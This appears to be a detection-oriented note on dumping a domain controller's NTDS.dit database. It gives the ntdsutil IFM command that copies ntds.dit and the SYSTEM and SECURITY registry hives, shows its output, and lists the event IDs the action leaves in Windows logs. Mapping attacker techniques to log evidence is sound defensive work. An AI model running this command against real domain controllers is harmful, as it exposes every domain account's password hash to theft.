Application NTDS.dit

Dumping Domain Controller Hashes Locally and Remotely | Red Team Noteswww.ired.team

Dump NTDS.dit with NTDSutil.exe:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Output:

C:\Users\Administrator>powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
C:\Windows\system32\ntdsutil.exe: ac i ntds
Active instance set to "ntds".
C:\Windows\system32\ntdsutil.exe: ifm
ifm: create full c:\temp
Creating snapshot...
Snapshot set {8860a3a3-5d94-4952-9060-89c6b412c4df} generated successfully.
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} mounted as C:\$SNAP_202306061921_VOLUMEC$\
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202306061921_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\temp\Active Directory\ntds.dit

                  Defragmentation  Status (omplete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\temp\registry\SYSTEM
Copying c:\temp\registry\SECURITY
Snapshot {6908dc16-973d-406d-b970-94ec943ae166} unmounted.
IFM media created successfully in c:\temp
ifm: q
C:\Windows\system32\ntdsutil.exe: q

Event ID	Description
216	A database location change was detected.
325	The database engine created a new database.
326	The database engine attached a database.
327	The database engine detached a database
637

Event Logs:

326 Event ID

326 Event ID

637 Event ID

637 Event ID

325 Event ID

325 Event ID

327 Event ID

327 Event ID

327 Event ID

216 Event ID

216 Event ID